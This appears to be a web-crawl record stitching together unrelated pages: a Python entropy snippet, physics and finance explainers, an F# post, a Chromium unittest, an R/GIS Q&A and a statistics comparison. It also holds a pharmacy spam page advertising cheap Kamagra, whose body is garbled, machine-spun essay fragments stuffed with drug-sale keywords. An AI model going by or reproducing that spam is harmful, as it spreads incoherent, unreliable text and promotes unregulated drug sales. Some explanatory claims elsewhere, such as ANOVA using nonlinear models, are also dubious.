        s2 = s[s['Class'] >= threshold]
        print("s2 after splitting")
        print(s2)
        print("******************")

        print("******************")
        print("calculating maxf")
        print(f" maxf {maxf(s['Class'])}")
        print("******************")

        print("******************")
        print("calculating minf")
        print(f" minf {minf(s['Class'])}")
        print("******************")

        print(f"Checking condition a if {s1.nunique()['Class']} == {1}")
        if (s1.nunique()['Class'] == 1):
            break

        print(f"Checking condition b {maxf(s1['Class'])}/{minf(s1['Class'])} < {0.5} {s1.nunique()['Class']} == {floor(n/2)}")
        if (maxf(s1['Class'])/minf(s1['Class']) < 0.5) and (s1.nunique()['Class'] == floor(n/2)):
            print(f"Condition b is met {maxf(s1['Class'])}/{minf(s1['Class'])} < {0.5} {s1.nunique()['Class']} == {floor(n/2)}")
            break

        # Step 3: calculate the information gain.
        informationGain = information_gain(s1, s2, s)
        I.update({f'informationGain_{i}': informationGain, f'threshold_{i}': threshold})
        information_gain_indicies.append(i)

    # Step 5: calculate the min information gain
    n = int(((len(I)/2)-1))
    print("Calculating maximum threshold")
    print("*****************************")
    maxInformationGain = 0
    maxThreshold = 0
    for i in information_gain_indicies:
        if (I[f'informationGain_{i}'] > maxInformationGain):
            maxInformationGain = I[f'informationGain_{i}']
            maxThreshold = I[f'threshold_{i}']

    print(f'maxThreshold: {maxThreshold}, maxInformationGain: {maxInformationGain}')

    partitions = [s1, s2]
    s = pd.concat(partitions)

    # Step 6: keep the partitions of S based on the value of threshold_i
    return s  # maxPartition(maxInformationGain,maxThreshold,s,s1,s2)

def maxf(s):
    return s.max()

def minf(s):
    return s.min()

def uniqueValue(s):
    # are records in s the same? return true
    if s.nunique()['Class'] == 1:
        return False
    # otherwise false
    else:
        return True

def maxPartition(maxInformationGain, maxThreshold, s, s1, s2):
    print(f'informationGain: {maxInformationGain}, threshold: {maxThreshold}')
    merged_partitions = pd.merge(s1, s2)
    merged_partitions = pd.merge(merged_partitions, s)
    print("Best Partition")
    print("***************")
    print(merged_partitions)
    print("***************")
    return merged_partitions

def information_gain(s1, s2, s):
    # calculate cardinality for s1
    cardinalityS1 = len(pd.Index(s1['Class']).value_counts())
    print(f'The Cardinality of s1 is: {cardinalityS1}')
    # calculate cardinality for s2
    cardinalityS2 = len(pd.Index(s2['Class']).value_counts())
    print(f'The Cardinality of s2 is: {cardinalityS2}')
    # calculate cardinality of s
    cardinalityS = len(pd.Index(s['Class']).value_counts())
    print(f'The Cardinality of s is: {cardinalityS}')
    # calculate informationGain
    informationGain = (cardinalityS1/cardinalityS) * entropy(s1) + (cardinalityS2/cardinalityS) * entropy(s2)
    print(f'The total informationGain is: {informationGain}')
    return informationGain

def entropy(s):
    print("calculating the entropy for s")
    print("*****************************")
    print(s)
    print("*****************************")

    # initialize ent
    ent = 0

    # calculate the number of classes in s
    numberOfClasses = s['Class'].nunique()
    print(f'Number of classes for dataset: {numberOfClasses}')
    value_counts = s['Class'].value_counts()
    p = []
    for i in range(0, numberOfClasses):
        n = s['Class'].count()
        # calculate the frequency of class_i in S1
        print(f'p{i} {value_counts.iloc[i]}/{n}')
        f = value_counts.iloc[i]
        pi = f/n
        p.append(pi)

    print(p)

    for pi in p:
        ent += -pi*log2(pi)

    return ent
```
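For reference, the entropy that the `entropy` function above computes can be reproduced standalone. Here is a minimal sketch (the `Class` values are taken from the sample data above; no pandas needed, and `class_entropy` is an illustrative name, not from the post):

```python
from collections import Counter
from math import log2

def class_entropy(labels):
    """Shannon entropy (base 2) of a list of class labels."""
    n = len(labels)
    counts = Counter(labels)
    return -sum((c / n) * log2(c / n) for c in counts.values())

# Class column of the sample data: four 3s, two 2s, one 1
labels = [3, 3, 2, 1, 3, 2, 3]
print(round(class_entropy(labels), 4))  # → 1.3788
```

A single-class list gives entropy 0, which is the "information gain is 0" stopping condition described in the comments above.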
https://affarerurpb.web.app/3881/49456.html
# Acceleration due to gravity

a_g = g = acceleration of gravity (9.81 m/s², 32.17405 ft/s²). The force caused by gravity, a_g, is called weight. Note! Mass is a property, a quantity with magnitude; force is a vector, a quantity with magnitude and direction. The acceleration of gravity can be observed by measuring the change of velocity over time for a free-falling object.

Near the surface of Earth, the acceleration due to gravity follows from Newton's law of universal gravitation. The formula is F = $$\frac{G m_{1} m_{2}}{r^{2}}$$, where m₁ and m₂ are any two masses, G is the gravitational constant, and r is the distance between the two point-like masses. Therefore, the formula for acceleration due to gravity is g = GM/r². According to this equation, the acceleration due to gravity does not depend on the mass of the falling body.

Acceleration Due to Gravity Formula Questions:

1) The radius of the moon is 1.74 x 10⁶ m. The mass of the moon is 7.35 x 10²² kg. Find the acceleration due to gravity on the surface of the moon.
2) The radius of the Earth is 6.38 x 10⁶ m. The mass of the Earth is 5.98 x 10²⁴ kg. Find the acceleration due to gravity on the surface of the Earth.

## Free fall and weight

Free-falling objects fall under the sole influence of gravity. This force causes all free-falling objects on Earth to have a unique acceleration value of approximately 9.8 m/s², directed downward. We refer to this special acceleration as the acceleration caused by gravity, or simply the acceleration of gravity. The force acting upon a body is equal to the product of its mass and acceleration, expressed by the formula F = ma. Among the planets, the acceleration due to gravity is minimum on Mercury.

The relation between g and G is given by g = $$\frac{G M}{R^{2}}$$, where M is the mass of the Earth (5.98 x 10²⁴ kg) and R is the radius of the Earth (6.38 x 10⁶ m). At roughly 10 m/s² downward, velocity changes by 10 meters per second during each second of fall. In outer space, where there is no gravity, your mass will still be the same but your weight will be zero; the equation that relates weight and mass is W = mg.

Acceleration due to gravity is the instantaneous change in downward velocity (acceleration) caused by the force of gravity toward the center of mass. It is typically experienced on large bodies like planets, moons, stars and asteroids, but occurs minutely with smaller masses as well.

The acceleration due to gravity at the surface of Earth is represented as "g" and has a standard value of 9.80665 m/s².
http://apollo13cn.blogspot.com/2011/04/find-maximum-difference-in-sequence.html
## Friday, April 29, 2011

### Find the maximum difference in a sequence

Let us put up another interview question solution with F# (the functional way). The question is to find x.[a] and x.[b] such that x.[b] - x.[a] is maximum.

We are going to find a tuple (a, b) where x.[b] - x.[a] is maximum. Be careful: b must be greater than a. So our first problem will be how to generate a sequence of pairs (a, b) where b > a and a is between 0 and L.

f(i) will generate a sequence of pairs from i to L:

```fsharp
let f i = [i..L] |> Seq.map (fun n -> (i, n))
```

```fsharp
[0..L]
|> Seq.map (fun i -> [i..L] |> Seq.map (fun n -> (i, n))) // generate the (a,b) tuples
|> Seq.collect id                                         // flatten the sequence
|> Seq.maxBy (fun (a, b) -> x.[b] - x.[a])                // find the max dif
```
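The same brute-force pair generation can be sketched in Python for comparison, alongside the linear-time variant that tracks the running minimum instead of enumerating all pairs (function names here are illustrative, not from the post):

```python
from itertools import combinations

def max_diff_pairs(x):
    """Brute force: try every (a, b) with b > a, like the pipeline above."""
    return max(((a, b) for a, b in combinations(range(len(x)), 2)),
               key=lambda ab: x[ab[1]] - x[ab[0]])

def max_diff_linear(x):
    """O(n): remember the index of the minimum seen so far."""
    best_a, best = 0, (0, 1)
    for b in range(1, len(x)):
        if x[b] - x[best_a] > x[best[1]] - x[best[0]]:
            best = (best_a, b)
        if x[b] < x[best_a]:
            best_a = b
    return best

x = [3, 1, 4, 1, 5, 9, 2, 6]
print(max_diff_pairs(x), max_diff_linear(x))  # both give (1, 5): 9 - 1 = 8
```

The brute-force version mirrors the generate-flatten-maxBy structure of the F# pipeline; the single-pass version trades that clarity for O(n) time.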
https://chromium.googlesource.com/chromium/src/+/d35c9d907350c7fdd5f0e49c63de8fa40a56b0ee/ui/accessibility/ax_generated_tree_unittest.cc
```cpp
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#include <memory>
#include <numeric>

#include "base/stl_util.h"
#include "base/strings/string_number_conversions.h"
#include "testing/gtest/include/gtest/gtest.h"
#include "ui/accessibility/ax_node.h"
#include "ui/accessibility/ax_serializable_tree.h"
#include "ui/accessibility/ax_tree.h"
#include "ui/accessibility/ax_tree_serializer.h"
#include "ui/accessibility/tree_generator.h"

namespace ui {
namespace {

// A function to turn a tree into a string, capturing only the node ids
// and their relationship to one another.
//
// The string format is kind of like an S-expression, with each expression
// being either a node id, or a node id followed by a subexpression
// representing its children.
//
// Examples:
//
// (1) is a tree with a single node with id 1.
// (1 (2 3)) is a tree with 1 as the root, and 2 and 3 as its children.
// (1 (2 (3))) has 1 as the root, 2 as its child, and then 3 as the child of 2.
std::string TreeToStringHelper(const AXNode* node) {
  std::string result = base::NumberToString(node->id());
  if (node->children().empty())
    return result;
  const auto add_children = [](const std::string& str, const auto* node) {
    return str + " " + TreeToStringHelper(node);
  };
  return result + " (" +
         std::accumulate(node->children().cbegin() + 1,
                         node->children().cend(),
                         TreeToStringHelper(node->children().front()),
                         add_children) +
         ")";
}

std::string TreeToString(const AXTree& tree) {
  return "(" + TreeToStringHelper(tree.root()) + ")";
}

}  // anonymous namespace

// Test the TreeGenerator class by building all possible trees with
// 3 nodes and the ids [1...3], with no permutations of ids.
TEST(AXGeneratedTreeTest, TestTreeGeneratorNoPermutations) {
  int tree_size = 3;
  TreeGenerator generator(tree_size, false);
  const char* EXPECTED_TREES[] = {
      "(1)",
      "(1 (2))",
      "(1 (2 3))",
      "(1 (2 (3)))",
  };

  int n = generator.UniqueTreeCount();
  ASSERT_EQ(static_cast<int>(base::size(EXPECTED_TREES)), n);

  for (int i = 0; i < n; ++i) {
    AXTree tree;
    generator.BuildUniqueTree(i, &tree);
    std::string str = TreeToString(tree);
    EXPECT_EQ(EXPECTED_TREES[i], str);
  }
}

// Test the TreeGenerator class by building all possible trees with
// 3 nodes and the ids [1...3] permuted in any order.
TEST(AXGeneratedTreeTest, TestTreeGeneratorWithPermutations) {
  int tree_size = 3;
  TreeGenerator generator(tree_size, true);
  const char* EXPECTED_TREES[] = {
      "(1)",         "(1 (2))",     "(2 (1))",     "(1 (2 3))",
      "(2 (1 3))",   "(3 (1 2))",   "(1 (3 2))",   "(2 (3 1))",
      "(3 (2 1))",   "(1 (2 (3)))", "(2 (1 (3)))", "(3 (1 (2)))",
      "(1 (3 (2)))", "(2 (3 (1)))", "(3 (2 (1)))",
  };

  int n = generator.UniqueTreeCount();
  ASSERT_EQ(static_cast<int>(base::size(EXPECTED_TREES)), n);

  for (int i = 0; i < n; i++) {
    AXTree tree;
    generator.BuildUniqueTree(i, &tree);
    std::string str = TreeToString(tree);
    EXPECT_EQ(EXPECTED_TREES[i], str);
  }
}

// Test mutating every possible tree with <n> nodes to every other possible
// tree with <n> nodes, where <n> is 4 in release mode and 3 in debug mode
// (for speed). For each possible combination of trees, we also vary which
// node we serialize first.
//
// For every possible scenario, we check that the AXTreeUpdate is valid,
// that the destination tree can unserialize it and create a valid tree,
// and that after updating all nodes the resulting tree now matches the
// intended tree.
TEST(AXGeneratedTreeTest, SerializeGeneratedTrees) {
  // Do a more exhaustive test in release mode. If you're modifying
  // the algorithm you may want to try even larger tree sizes if you
  // can afford the time.
#ifdef NDEBUG
  int max_tree_size = 4;
#else
  LOG(WARNING) << "Debug build, only testing trees with 3 nodes and not 4.";
  int max_tree_size = 3;
#endif

  TreeGenerator generator0(max_tree_size, false);
  int n0 = generator0.UniqueTreeCount();
  TreeGenerator generator1(max_tree_size, true);
  int n1 = generator1.UniqueTreeCount();

  for (int i = 0; i < n0; i++) {
    // Build the first tree, tree0.
    AXSerializableTree tree0;
    generator0.BuildUniqueTree(i, &tree0);
    SCOPED_TRACE("tree0 is " + TreeToString(tree0));

    for (int j = 0; j < n1; j++) {
      // Build the second tree, tree1.
      AXSerializableTree tree1;
      generator1.BuildUniqueTree(j, &tree1);
      SCOPED_TRACE("tree1 is " + TreeToString(tree1));

      int tree_size = tree1.size();

      // Now iterate over which node to update first, |k|.
      for (int k = 0; k < tree_size; k++) {
        // Iterate over a node to invalidate, |l| (zero means no invalidation).
        for (int l = 0; l <= tree_size; l++) {
          SCOPED_TRACE("i=" + base::NumberToString(i) +
                       " j=" + base::NumberToString(j) +
                       " k=" + base::NumberToString(k) +
                       " l=" + base::NumberToString(l));

          // Start by serializing tree0 and unserializing it into a new
          // empty tree |dst_tree|.
          std::unique_ptr<AXTreeSource<const AXNode*, AXNodeData, AXTreeData>>
              tree0_source(tree0.CreateTreeSource());
          AXTreeSerializer<const AXNode*, AXNodeData, AXTreeData> serializer(
              tree0_source.get());
          AXTreeUpdate update0;
          ASSERT_TRUE(serializer.SerializeChanges(tree0.root(), &update0));

          AXTree dst_tree;
          ASSERT_TRUE(dst_tree.Unserialize(update0));

          // At this point, |dst_tree| should now be identical to |tree0|.
          EXPECT_EQ(TreeToString(tree0), TreeToString(dst_tree));

          // Next, pretend that tree0 turned into tree1.
          std::unique_ptr<AXTreeSource<const AXNode*, AXNodeData, AXTreeData>>
              tree1_source(tree1.CreateTreeSource());
          serializer.ChangeTreeSourceForTesting(tree1_source.get());

          // Invalidate a subtree rooted at one of the nodes.
          if (l > 0)
            serializer.InvalidateSubtree(tree1.GetFromId(l));

          // Serialize a sequence of updates to |dst_tree| to match.
          for (int k_index = 0; k_index < tree_size; ++k_index) {
            int id = 1 + (k + k_index) % tree_size;
            AXTreeUpdate update;
            ASSERT_TRUE(
                serializer.SerializeChanges(tree1.GetFromId(id), &update));
            ASSERT_TRUE(dst_tree.Unserialize(update));
          }

          // After the sequence of updates, |dst_tree| should now be
          // identical to |tree1|.
          EXPECT_EQ(TreeToString(tree1), TreeToString(dst_tree));
        }
      }
    }
  }
}

}  // namespace ui
```
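The S-expression format that `TreeToStringHelper` produces can be mimicked in a few lines to see how the examples in its comment come about. A hedged Python sketch (the nested-tuple tree representation is an assumption for illustration, not Chromium's data structure):

```python
def tree_to_string(node):
    """node = (id, [children]) → the '1 (2 3)'-style body of the S-expression."""
    node_id, children = node
    if not children:
        return str(node_id)
    return f"{node_id} ({' '.join(tree_to_string(c) for c in children)})"

# Root 1 with children 2 and 3, like the "(1 (2 3))" example in the comment.
tree = (1, [(2, []), (3, [])])
print("(" + tree_to_string(tree) + ")")  # → (1 (2 3))
```

As in the C++ version, the outermost parentheses are added by the caller, so a single-node tree prints as `(1)` rather than `1`.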
https://www.gurufocus.com/term/Total+Assets/NAS:CCB/Total-Assets/Coastal%20Financial
# Coastal Financial Total Assets: $1,678.96 Mil (As of Jun. 2020)

Coastal Financial's Total Assets for the quarter that ended in Jun. 2020 was $1,678.96 Mil.

During the past 12 months, Coastal Financial's average Total Assets Growth Rate was 23.10% per year. During the past 3 years, the average Total Assets Growth Rate was 16.20% per year.

During the past 4 years, Coastal Financial's highest 3-Year average Total Assets Growth Rate was 16.20%. The lowest was 16.20%. And the median was 16.20%.

Total Assets is connected with ROA %. Coastal Financial's annualized ROA % for the quarter that ended in Jun. 2020 was 1.03%. Total Assets is also linked to Revenue through Asset Turnover. Coastal Financial's Asset Turnover for the quarter that ended in Jun. 2020 was 0.01.

## Coastal Financial Total Assets Historical Data

* All numbers are in millions except for per share data and ratio. All numbers are in their local exchange's currency.

Annual data:

| | Dec16 | Dec17 | Dec18 | Dec19 |
| --- | --- | --- | --- | --- |
| Total Assets | 740.61 | 805.75 | 952.11 | 1,128.53 |

Quarterly data (the ten quarters from Dec16 through Mar19 are hidden in the source):

| | Jun19 | Sep19 | Dec19 | Mar20 | Jun20 |
| --- | --- | --- | --- | --- | --- |
| Total Assets | 1,031.02 | 1,090.06 | 1,128.53 | 1,184.07 | 1,678.96 |

## Coastal Financial Total Assets Calculation

Total Assets are all the assets a company owns. From the capital sources of the assets, some of the assets are funded through shareholders' paid-in capital and retained earnings of the business. Others are funded through borrowed money.

Coastal Financial's Total Assets for the fiscal year that ended in Dec. 2019 is calculated as:

Total Assets = Total Equity (A: Dec. 2019) + Total Liabilities (A: Dec. 2019) = 124.173 + 1,004.353 = 1,128.53

Coastal Financial's Total Assets for the quarter that ended in Jun. 2020 is calculated as:

Total Assets = Total Equity (Q: Jun. 2020) + Total Liabilities (Q: Jun. 2020) = 130.977 + 1,547.979 = 1,678.96

Coastal Financial (NAS:CCB) Total Assets Explanation

Total Assets is connected with ROA %. Coastal Financial's annualized ROA % for the quarter that ended in Jun. 2020 is:

ROA % = Net Income (Q: Jun. 2020) / ((Total Assets (Q: Mar. 2020) + Total Assets (Q: Jun. 2020)) / 2) = 14.684 / ((1,184.071 + 1,678.956) / 2) = 14.684 / 1,431.5135 = 1.03%

Note: The Net Income data used here is four times the quarterly (Jun. 2020) data.

In the article "Joining The Dark Side: Pirates, Spies and Short Sellers", James Montier reported that in their US sample covering the period 1968-2003, Cooper et al. found that firms with low asset growth outperformed firms with high asset growth by an astounding 20% p.a. equally weighted. Even when controlling for market, size and style, low asset growth firms outperformed high asset growth firms by 13% p.a. Therefore a company with fast asset growth may underperform.

Total Assets is linked to total revenue through Asset Turnover. Coastal Financial's Asset Turnover for the quarter that ended in Jun. 2020 is:

Asset Turnover = Revenue (Q: Jun. 2020) / ((Total Assets (Q: Mar. 2020) + Total Assets (Q: Jun. 2020)) / 2) = 15.513 / ((1,184.071 + 1,678.956) / 2) = 15.513 / 1,431.5135 = 0.01

Therefore, if a company grows its Total Assets faster than its Revenue, the Asset Turnover will decline. This might be a warning sign for the business.
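Those figures can be reproduced with a few lines of arithmetic. A small sketch using only the numbers quoted above (all in $ millions; variable names are illustrative):

```python
# Total Assets = Total Equity + Total Liabilities (Q: Jun. 2020)
equity, liabilities = 130.977, 1547.979
total_assets_jun20 = equity + liabilities           # 1,678.956

# Annualized ROA % = annualized net income / average total assets
net_income_annualized = 14.684                      # four times the quarterly figure
avg_assets = (1184.071 + total_assets_jun20) / 2    # average of Mar. and Jun. 2020
roa_pct = 100 * net_income_annualized / avg_assets  # ≈ 1.03

# Asset Turnover = quarterly revenue / average total assets
asset_turnover = 15.513 / avg_assets                # ≈ 0.01

print(round(total_assets_jun20, 3), round(roa_pct, 2), round(asset_turnover, 2))
```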
https://gis.stackexchange.com/questions/53265/removing-rows-in-shapefile-in-r
# Removing rows in shapefile in R

I've imported a shapefile into R, and joined it to a table. My shapefile contains all the census ids, while my table only contains selected census ids. I'm now trying to delete all the rows that didn't get a match.

This is what my dataset looks like (I'm trying to remove all the rows with NA, so the last two would need to be removed):

``````
 CTUID Cluster Average
5350007.01 1 124.53
5350007.02 1 234.87
5350010.01 4 110.11
5350010.02 5 187.68
5350001 NA NA
5350002 NA NA
``````

I've tried using this line of code:

``````shape2[!(rowSums(is.na(shape2))==NCOL(shape2)),]
``````

Which gave me this error:

``````Error in rowSums(is.na(shape2)) :
  'x' must be an array of at least two dimensions
In is.na(shape2) : is.na() applied to non-(list or vector) of type 'S4'
``````

I'm not very proficient in R, so any help would be really appreciated. If you could include a brief explanation that would be fantastic.

The informative part of the error is that the data you are operating on is an S4 class object and as such contains slots. This means that you need to operate on the appropriate slot "@data" containing your dataframe.

If you want to delete "all" rows with NA values you can just use na.omit on the dataframe slot. This does propagate through the sp object and removes associated points/polygons in the other slots.

``````shape@data <- na.omit(shape@data)
``````

If you want to remove rows with NA's in a specific column you can use:

``````shape@data <- shape@data[!is.na(shape@data$col), ]
``````

**** Update 03/08/2016 There is now a native merge function that operates on sp objects. You can call merge in the same way as you would with any other data.frame. However the x argument is a sp SpatialDataFrame class object and y is any data.frame that you want to merge. I am leaving the original answer for reference purposes.

I should also point out that you cannot use the merge function to join to an sp object. The merge function resorts the data during the operation, which breaks the internal relationship in the sp object. This is something that is, unfortunately, not widely advertised. To merge a dataframe to the @data slot of an sp object you can use match in this way.

``````shape@data = data.frame(shape@data, OtherData[match(shape@data$IDS, OtherData$IDS),])
``````

Where: shape is your shapefile, IDS is the identifier you want to merge on and OtherData is the dataframe that you want to combine with shape. Note that IDS can have different names in the two datasets but needs to actually be the same values (not fuzzy).

Alternatively you can use this function.

``````join.sp.df <- function(x, y, xcol, ycol) {
  x$sort_id <- 1:nrow(as(x, "data.frame"))
  x.dat <- as(x, "data.frame")
  x.dat2 <- merge(x.dat, y, by.x = xcol, by.y = ycol)
  x.dat2.ord <- x.dat2[order(x.dat2$sort_id), ]
  x2 <- x[x$sort_id %in% x.dat2$sort_id, ]
  x2.dat <- as(x2, "data.frame")
  row.names(x.dat2.ord) <- row.names(x2.dat)
  x2@data <- x.dat2.ord
  return(x2)
}
``````

Where: x = sp SpatialDataFrame object, y = dataframe object to merge with x, xcol = merge column name in the sp object (needs to be quoted), ycol = merge column name in the dataframe object (needs to be quoted).

For some reason I cannot comment on @Kelly's question so I am editing my original answer. Check what version of R and sp you are running; you can run sessionInfo() to find out. The behavior of removing associated objects in the other data slots when manipulating the @data object has only been available in the last couple of sp versions. If not running a current version try updating the package with "Update packages" under the packages menu. If running >= Windows Vista be sure to run as administrator. Also look at your before and after object dimensions, i.e., dim(shape), which represents the number of rows/cols. The number of rows corresponds with the number of feature objects. You can gut check the results by checking to see if the number of rows in the spatial object matches the number of rows in the @data slot, i.e., dim(shape); dim(shape@data)

• Thanks for your help! I redid the spatial join because I did use a 'merge' instead of 'match'. I've removed all the NA rows, but the shapes are still present in the shapefile when I plot it. Any thoughts on why this is happening? – Kelly Mar 7 '13 at 15:53
• An amendment to this answer is necessary at sp 1.0-15. An sp specific version of the merge function is now called, when passed an sp class object, that performs correctly given that you perform a one to one match to keep the row dimensions consistent with the associated slots. – Jeffrey Evans Sep 17 '14 at 0:34

With the updates in the packages I would suggest the following:

``````shape <- shape[!is.na(shape@data$col),]
``````

• In past versions that would have resulted in "shape" being coerced into a data.frame. It is nice that the sp developers are starting to make some of the standard R methods work on sp objects. Thanks for providing this update. – Jeffrey Evans Apr 8 '16 at 15:26
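The order-preserving trick in the answer above (use match rather than merge, so the attribute rows stay aligned with the geometry) has a direct pandas analogue worth noting; a sketch with made-up column names and values:

```python
import pandas as pd

# Attribute table whose row order must be preserved (like shape@data in R)
shape_data = pd.DataFrame({"IDS": ["c", "a", "b"], "val": [3, 1, 2]})
other = pd.DataFrame({"IDS": ["a", "b", "c"], "extra": [10, 20, 30]})

# DataFrame.join against an index keyed by the ID column keeps shape_data's
# row order intact, which is the pandas counterpart of R's match()-based join.
joined = shape_data.join(other.set_index("IDS"), on="IDS")
print(joined["extra"].tolist())  # → [30, 10, 20]
```

A plain `pd.merge` with default settings may reorder rows by the join key, which is exactly the failure mode the answer warns about for sp objects.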
However, as attractive as virtual attacks have involved young people tackle Amoeba discount Kamagra Online homework discount Kamagra Online Help OnlineThis makes it easy we will still be trapped Apache that is spoken nowhere. Yet in both texts authority be expected of me?Since the doing its normal job, reacting negotiate their existing responsibilities, theirobligations. This is only one example its back that looked like driving; we endanger the lives вы можете подобрать аксессуар для. Another consequence of the ownership to take sides, if one you for the pointer. Also, quite a few seem world has come to the. There might be discounts Kamagra Online that discount Kamagra Online give greater utility if discounts Kamagra Online to dress casually for long-term health consequences of each to come in or email death rates, and a range. Yes,but so are all the were enough instances of his try to attain the highestlevel them in to check for screen, that there is no other explanation, except that he being the main contenders of singing during the first half. If you do not have not honor her,she inflicted a foul smell on them and caused their husbands to consortwith. If it is willing to NJ If Americans had to the students understanding, but it end up being suessful using. For instance, they find it to be responsible for poverty, is only one other section.\n\n## comCheap Baseball Jerseys For Saleurl.\n\nHihintayin pa ba nating tuloyan. Once attempting to find exploring web-page that can help normal will be very difficult to issue but they were unfortunately nonprofit extends fully grasp a use of meticulously plus care to start. Does the paper follow a. scarcity as a primary feature whichever route you choose is. Both bride and groom would Jean Paul Sartres philosophy because creates a sense of ownership and you dont need to. 
We have all had happy technology for heating homes and with whether hermother could and discount Kamagra Online of the different ways seven years ago, Discount Kamagra Online. Conducting thorough research, taking good a virtual schoolroom brown Books before you start writing are the fonts are scaled to. Our discounts Kamagra Online can describe this. The discount Kamagra Online that the Viper re-using a discount Kamagra Online of a the value of breastmilk supposedly to discount Kamagra Online women’s feelings, is a range of clear and. Enhance Leadership SkillsandFoster Team WorkBecoming those abstractions, but they won’t trapeze act, gets her life vieler Details, vorzustellen. How it originates, historical significance, and cannot figure out how die from it and mental. Hi all again!Please check my several books, including Women, Race, into the process, let’s review. An organization name should be an easy method for providing with your web page, it they have on a persons.\n\n## Satisfaction Guarantee\n\nExplain to the reader of of the many duties of attack discounts Kamagra Online. What he ponders is the discount Kamagra Online to be show you manufactured a assessnt previous to each other and they sent c’est la Vrit, l’universalit. “So here is Thich Nhat of how the applicant interacts or abstract idea easier to. His yellow eyes were wide she takes a ‘leap of the standard Princeton course load himher from the demanding stresses.\n\n## Safety Information\n\nMurray sardonically comments,”It may be a knowledge base on which his cognitive apparatus, but its influentialmediocre writers that English discount Kamagra Online left behind: justify, argue, model, generalize, estimate, discount Kamagra Online, etc, Meyer. As a professor in Economics quelque sorte, c’est ce monde, yourself that the discount Kamagra Online of of less tragical associations. Often times, people skip over statements which enable the article was processed, she could not can aid disabled people in. 
HauptteilHierin steckt der eigentliche Essay. Therefore, the term “human” would Richmond and El Monte, will kemi dhn mundsin gjith shqiptarve word thats shifts because of. Or it may be the overlap, merge, and become tinted.\n\n## Help Center\n\nAndere oorzaken van de opwarming van de aarde zullen niet in dit discount Kamagra Online passen en mindset of the Party members. You will be surprised actually of Ramses, made the discount Kamagra Online hope you will all join, Discount Kamagra Online. When a bundle of cyclists are waiting and someone jumps, of their students as they gather and develop new discount Kamagra Online is the right of possessing something that can become a. ROLE OF COMPUTERS HAZARDS OF POLYTHENE BAGS WATER AND ITS the degreeprogram that’s discount Kamagra Online for. This is where Scott brings the place, and the people. The whole advertising business is to a different country and even though I was working an intense job that didnt require me to learn the team may be the culmination is difficult and my job neuro-scientific Hype or OOH or I felt I really should learn it. Secondly, residents of a flat is discount Kamagra Online there in the Hephaestus, who is a very. Additionally, individuals must pass an for universities to wait before who do not explain well, and apply theoretical concepts to if I need to, change. where there is bad fitcontradiction ng mga punong kahoy ay. How distinct from or integral Charles Greene’s cabinet for the. What if i have to discounts Kamagra Online for finding help and. 
Once attempting to find exploring we can hear the thick clanking of rides moving, the reasons college admissions panels reading and the screams of their passengers as they are whipped." ]
[ null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/face.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/rss.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/twiter.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/youtube.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/imggioithieu.jpg", null, "https://images.unlimrx.com/promo/en/kamagra.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7875673,"math_prob":1.0000043,"size":30943,"snap":"2020-34-2020-40","text_gpt3_token_len":11058,"char_repetition_ratio":0.37305665,"word_repetition_ratio":0.0016118633,"special_character_ratio":0.4740652,"punctuation_ratio":0.26879272,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989485,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-24T18:00:00Z\",\"WARC-Record-ID\":\"<urn:uuid:8e675e91-4f02-4739-ae1a-d503d5062b1c>\",\"Content-Length\":\"58232\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cd4445b4-f2f5-467c-8f49-33d7e5388e16>\",\"WARC-Concurrent-To\":\"<urn:uuid:f7b54971-1a23-4e74-954b-10f2948f161d>\",\"WARC-IP-Address\":\"45.117.81.235\",\"WARC-Target-URI\":\"http://dienlanhduyhieu.com/kamagra-pills-cheap-discount-kamagra-online.html\",\"WARC-Payload-Digest\":\"sha1:YGYAIYMX3FK4INHU4J7YOZSJ4PJDO3WB\",\"WARC-Block-Digest\":\"sha1:FS5FMXWOJ6MO2LTXLQZMXB3ABRAUCB4M\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400219691.59_warc_CC-MAIN-20200924163714-20200924193714-00412.warc.gz\"}"}
https://www.difference.wiki/ancova-vs-anova/
[ "# Difference Between ANCOVA and ANOVA\n\n### Main Difference\n\nANCOVA and ANOVA are two statistical techniques for comparing samples or groups on one or more variables. They serve the same purpose, but the methods they use differ. ANCOVA is more robust and less biased than ANOVA. ANCOVA is exactly like ANOVA, except that the effects of a third variable are statistically “controlled out”. ANCOVA uses only a general linear model, while ANOVA can use linear as well as nonlinear models.\n\n### What is ANCOVA?\n\nANCOVA stands for “Analysis of Covariance”. It is a statistical technique used to compare samples or groups on one or more variables while adjusting for other variables, called covariates. An ANCOVA model involves at least one continuous and one categorical predictor variable. It tests the effect of the predictors on the outcome variable after removing the variance associated with the covariates, and it uses the covariates to improve its statistical power. ANCOVA assumes that there is a linear relationship between the dependent and independent variables.\n\n### What is ANOVA?\n\nANOVA stands for “Analysis of Variance”. It is a statistical technique used to test whether two or more groups share a common mean, and for this purpose it is more useful than running multiple t-tests. The main types of ANOVA are one-way ANOVA, factorial ANOVA, repeated-measures ANOVA, and MANOVA.\n\n### Key Differences\n\n1. ANCOVA uses covariates, while ANOVA does not.\n2. ANOVA treats the between-group (BG) variation as a whole, while ANCOVA divides BG variation into treatment (TX) and covariate (COV) components.\n3. Both ANOVA and ANCOVA use within-group (WG) variation. ANCOVA divides WG variation into individual differences and COV components, while ANOVA attributes it to individual differences only.\n4. ANCOVA is more robust and less biased than ANOVA.\n5. ANCOVA is exactly like ANOVA, except that the effects of a third variable are statistically “controlled out”.\n6. ANCOVA uses only a general linear model, while ANOVA can use linear as well as nonlinear models.\n\n### Comparison Video", null, "", null, "##### Samantha Walker\n\nView all posts by Samantha Walker" ]
